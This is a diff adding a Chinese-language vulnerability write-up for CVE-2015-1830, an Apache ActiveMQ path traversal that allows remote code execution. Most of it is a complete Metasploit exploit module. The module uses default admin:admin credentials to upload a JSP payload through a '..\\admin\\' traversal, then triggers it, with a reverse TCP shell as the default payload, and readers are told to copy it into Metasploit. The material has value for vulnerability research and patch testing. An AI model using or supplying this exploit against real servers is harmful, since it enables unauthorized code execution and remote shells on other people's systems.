|
| 1 | +(CVE-2015-1830)ActiveMQ 路径遍历导致未经身份验证的rce |
| 2 | +======================================================= |
| 3 | + |
| 4 | +一、漏洞简介 |
| 5 | +------------ |
| 6 | + |
| 7 | +Windows 5.11.2之前的Apache ActiveMQ |
| 8 | +5.x中blob消息的文件服务器上载/下载功能中的目录遍历漏洞允许远程攻击者通过未指定的向量在任意目录中创建JSP文件。 |
| 9 | + |
| 10 | +二、漏洞影响 |
| 11 | +------------ |
| 12 | + |
| 13 | +ActiveMQ 5.11.1 |
| 14 | + |
| 15 | +三、复现过程 |
| 16 | +------------ |
| 17 | + |
| 18 | +### msf poc |
| 19 | + |
| 20 | +> 直接在msf里面搜索就行了,如果没有请更新msf版本,或者手动复制下面的脚本到msf目录下。 |
| 21 | +
|
| 22 | + ## |
| 23 | + # This module requires Metasploit: https://metasploit.com/download |
| 24 | + # Current source: https://github.com/rapid7/metasploit-framework |
| 25 | + ## |
| 26 | + |
| 27 | + class MetasploitModule < Msf::Exploit::Remote |
| 28 | + Rank = ExcellentRanking |
| 29 | + |
| 30 | + include Msf::Exploit::Remote::HttpClient |
| 31 | + |
| 32 | + def initialize(info = {}) |
| 33 | + super(update_info(info, |
| 34 | + 'Name' => 'Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload', |
| 35 | + 'Description' => %q{ |
| 36 | + This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache |
| 37 | + ActiveMQ 5.x before 5.11.2 for Windows. |
| 38 | + |
| 39 | + The module tries to upload a JSP payload to the /admin directory via the traversal |
| 40 | + path /fileserver/..\\admin\\ using an HTTP PUT request with the default ActiveMQ |
| 41 | + credentials admin:admin (or other credentials provided by the user). It then issues |
| 42 | + an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the |
| 43 | + payload and obtain a shell. |
| 44 | + }, |
| 45 | + 'Author' => |
| 46 | + [ |
| 47 | + 'David Jorm', # Discovery and exploit |
| 48 | + 'Erik Wynter' # @wyntererik - Metasploit |
| 49 | + ], |
| 50 | + 'References' => |
| 51 | + [ |
| 52 | + [ 'CVE', '2015-1830' ], |
| 53 | + [ 'EDB', '40857'], |
| 54 | + [ 'URL', 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt' ] |
| 55 | + ], |
| 56 | + 'Privileged' => false, |
| 57 | + 'Platform' => %w{ win }, |
| 58 | + 'Targets' => |
| 59 | + [ |
| 60 | + [ 'Windows Java', |
| 61 | + { |
| 62 | + 'Arch' => ARCH_JAVA, |
| 63 | + 'Platform' => 'win' |
| 64 | + } |
| 65 | + ], |
| 66 | + ], |
| 67 | + 'DisclosureDate' => '2015-08-19', |
| 68 | + 'License' => MSF_LICENSE, |
| 69 | + 'DefaultOptions' => { |
| 70 | + 'RPORT' => 8161, |
| 71 | + 'PAYLOAD' => 'java/jsp_shell_reverse_tcp' |
| 72 | + }, |
| 73 | + 'DefaultTarget' => 0)) |
| 74 | + |
| 75 | + register_options([ |
| 76 | + OptString.new('TARGETURI', [true, 'The base path to the web application', '/']), |
| 77 | + OptString.new('PATH', [true, 'Traversal path', '/fileserver/..\\admin\\']), |
| 78 | + OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']), |
| 79 | + OptString.new('PASSWORD', [true, 'Password to authenticate with', 'admin']) |
| 80 | + ]) |
| 81 | + end |
| 82 | + |
| 83 | + def check |
| 84 | + print_status("Running check...") |
| 85 | + testfile = Rex::Text::rand_text_alpha(10) |
| 86 | + testcontent = Rex::Text::rand_text_alpha(10) |
| 87 | + |
| 88 | + send_request_cgi({ |
| 89 | + 'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"), |
| 90 | + 'headers' => { |
| 91 | + 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) |
| 92 | + }, |
| 93 | + 'method' => 'PUT', |
| 94 | + 'data' => "<% out.println(\"#{testcontent}\");%>" |
| 95 | + }) |
| 96 | + |
| 97 | + res1 = send_request_cgi({ |
| 98 | + 'uri' => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"), |
| 99 | + 'headers' => { |
| 100 | + 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) |
| 101 | + }, |
| 102 | + 'method' => 'GET' |
| 103 | + }) |
| 104 | + |
| 105 | + if res1 && res1.body.include?(testcontent) |
| 106 | + send_request_cgi( |
| 107 | + opts = { |
| 108 | + 'uri' => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"), |
| 109 | + 'headers' => { |
| 110 | + 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) |
| 111 | + }, |
| 112 | + 'method' => 'DELETE' |
| 113 | + }, |
| 114 | + timeout = 1 |
| 115 | + ) |
| 116 | + return Exploit::CheckCode::Vulnerable |
| 117 | + end |
| 118 | + |
| 119 | + Exploit::CheckCode::Safe |
| 120 | + end |
| 121 | + |
| 122 | + def exploit |
| 123 | + print_status("Uploading payload...") |
| 124 | + testfile = Rex::Text::rand_text_alpha(10) |
| 125 | + vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testfile}.jsp") #This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails. |
| 126 | + |
| 127 | + send_request_cgi({ |
| 128 | + 'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"), |
| 129 | + 'headers' => { |
| 130 | + 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) |
| 131 | + }, |
| 132 | + 'method' => 'PUT', |
| 133 | + 'data' => payload.encoded |
| 134 | + }) |
| 135 | + |
| 136 | + print_status("Payload sent. Attempting to execute the payload.") |
| 137 | + res = send_request_cgi({ |
| 138 | + 'uri' => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"), |
| 139 | + 'headers' => { |
| 140 | + 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) |
| 141 | + }, |
| 142 | + 'method' => 'GET' |
| 143 | + }) |
| 144 | + if res && res.code == 200 |
| 145 | + print_good("Payload executed!") |
| 146 | + else |
| 147 | + fail_with(Failure::PayloadFailed, "Failed to execute the payload") |
| 148 | + end |
| 149 | + end |
| 150 | + end |
0 commit comments